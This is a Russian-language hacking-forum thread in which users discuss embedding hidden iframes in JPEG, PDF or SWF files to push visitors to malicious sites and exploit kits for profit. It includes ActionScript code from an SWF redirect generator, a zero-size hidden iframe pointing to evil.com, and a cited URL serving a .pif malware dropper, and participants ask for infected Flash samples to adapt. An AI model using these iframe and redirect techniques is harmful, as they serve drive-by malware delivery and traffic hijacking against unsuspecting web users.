Iframe на jpeg

[TrueUser]

Не работает такой вариант. Когда браузер запрашивает код картинки он не будет исполнять полученный в ней яваскрипт. По крайней мере с жипег точно не работает. Я пробовал уже насчет анимации не знаю.. Надо пробовать.

 

[Ar3s]

Вот отсюда брал принцип. Тут же работает... Разница только в том, что там gif а у меня jpg. Но я не думаю что это имеет какое-то значение.

 

[lisa99]

посмотри на всякий случай это
Если общеизвестно- извиняюсь. мне понравилась в свое время там идея обхода фильтров.

Обход фильтрации загружаемых изображений в ряде Web-приложений для осуществления XSS атак
_www.dsec.ru/about/articles/web_xss/

 

[Mr.Di]

Ar3s
поправка, там ты сам заходишь брозером на ссылку, а когда ты вставляешь в виде имг тэга, то броузер пытается выполнить содержимое полученное по иг тэгу именно как картинку

 

[Ar3s]

Так. Я тебя понял. Не могу вкурить только один момент. В чем разница с случаем описанным на хабре и в моем примере?

В том, что в моем случае браузер видит тег img а в случае на хабре браузер видит прямой линк на картинку?

 

[Mr.Di]

разница в том, что в случае когда ты просто переходишь по ссылке на якобы картинку, браузер не знает что там будет, и обрабатывает как общий хтмл, в случае-же когда картинка указана через тэг, то браузер знает что там должна быть именно картинка и ничего большего, а так-как там вместо неё хтмл и етк, то соотв он прерывает выполение картинки

 

[Ar3s]

т.е. для спама годится метода, а для трафика через ftp - нет. Понятно. буду дальше жевать вопрос.

И спасибо а разъяснение.

 

[TrueUser]

Для того чтобы ифремить альтернативным методом надо использовать уязвимости (то биш фактически сплойт но вместо дамаж кода совать ифрем туда). Например тот же пдф. Затолкать в него яваскрипт который ифрем мутит, или swf юзать для этого ...

 

[Ar3s]

Тааак. А кто может просветить по-поводу iframe в swf?
Я на кое-какие статейки нарывался, но конкретики пока не видел. Если тема прибыльная - велком в личку. Интересуюсь лично для себя.

 

[lisa99]

это элементарно, есть даже онлайн генераторы iframe и редиректов,
хотя тот что я тестила коряво написан-ошибки в коде.

достаточно поймать хоть один работающий iframe на sfw, чтобы распотрошив флеш подправить AS скрипт в свою пользу.

 

[Ar3s]

Lisa99 Выдай нам пример для потрошения. Я постараюсь раскромсать его и, может быть, статейку маленькую накатаю.

 

[KraZz]

UP

может быть, статейку маленькую накатаю.

хотелось бы узнать, будет ли статейка?
В теме НЕ шарю, но может это поможет как-нибудь
http://lmageshack.org/img/imgrav.jpg льецца оттуда "засранчик" pic879.pif
ЗЫ: c доменного имени ржунемагу %))), фантазия без границ..
источник http://www.malwaredomainlist.com/mdl.php?i...ity=1000&page=0

 

[lisa99]

* Самы папулярны выкарыстоўваны эксплойт на web'е - Эксплойты для SWF-уразлівасці. На дзель SWF-эксплойтаў прыйшлося 12% шкоднаснага кантэнту за месяц

*Самы распаўсюджаны зловред на вэбе - Trojan-Downloader.HTML.IFrame.wf. На яго дзель прыйшлося амаль 8% шкоднаснага трафіку

это от 23 студзеня 2009

Я не знаю, имеется ли ввиду уязвимость в 9 плеере Adobe, и что за расширение у этого ифрейма

Редирект устроить на AS3 элем ентарно. Притом он не палится ничем, работает при отклеченной графике в браузере. Если что-то другое- нужно смотреть
Я отпишусь с конкретным простым примером сегодня в течении дня.

Lisa99 Выдай нам пример для потрошения. Я постараюсь раскромсать его

все наоборот. у меня богатый арсенал флешриппера и практически нет примеров. Т.е. я распотрошу все что угодно, если, конечно там нет сложной обфускации (так закрывают большие проекты на флеше), но у меня нет примеров зараженных флешек, swf-вирусов, и я никак не могу их найти на сайтах и хак-форумах, сколько бы не старалась
Поэтому если кому-то попадалась такая малварь или держит на винте - отдайте, если не жалко, если уж делать обзор.

2 вариант - напишите, чтобы ты хотелось, чтобы делал флеш - можно написать это на AS3 и вшить в любой готовый мувик, или сделать свой
(кстати, можно подгружать в свой флеш другой с других сайтов, а баннер взять..ну мозги той же сапы, допустим, за исходный)

 

[DeusTirael]

Уязвимость под 9 флеш https://xss.pro/index.php?topic=18083

 

[lisa99]

Уязвимость под 9 флеш

ок. надеюсь ты разобрался с декомпилятором


http://swfgen.m0nster.tu2.ru/
по факту - генератор редиректов



создается прозрачный однопиксельный рисунок и на 4 фрейма навешивается код - где указывается дрес сайта

1)
if (getBytesLoaded() >= getBytesTotal())
{
gotoAndPlay(5);
}

3)
if (getBytesLoaded() >= getBytesTotal())
{
gotoAndPlay(5);
}

4)
progress = int(getBytesLoaded() * "100" / getBytesTotal()) + "% - loading Flash...";
gotoAndPlay(3);

5)getURL("http://1075.ru ", "");
play();

 

[Ar3s]

Ну тут не сложная конструкция. Плохо то, что он тупо перекидывает на нужный сайт. А интересует возможность iframe.

Можно конечно замутить с редиректом на связку, а с нее по реферу обратно, но тут уж зацикливание получается. Или что-то мудрить надо.

 

[lisa99]

конечно несложная.
интересная идея генератора
я ж говорю- напиши текст ифрейма. конкретно

 

[TrueUser]

напиши текст ифрейма. конкретно

А ведь по делу придется ифрейм так или иначе перекриптовывать. Надо что то универсально мутить

 

[lisa99]

перекриптовывать

У Action Script возможностей не меньше, чем у JavaScript

Надо что то универсально мутить

это общая фраза..давай начнем с конкретики, ок?

 

[TrueUser]

давай начнем с конкретики

Дык в чем тебе требуется конкретика? Все просто, для начала это заставить браузер исполнить такой код <iframe src='http://evil.com' width=0 height=0 frameborder=0></iframe>.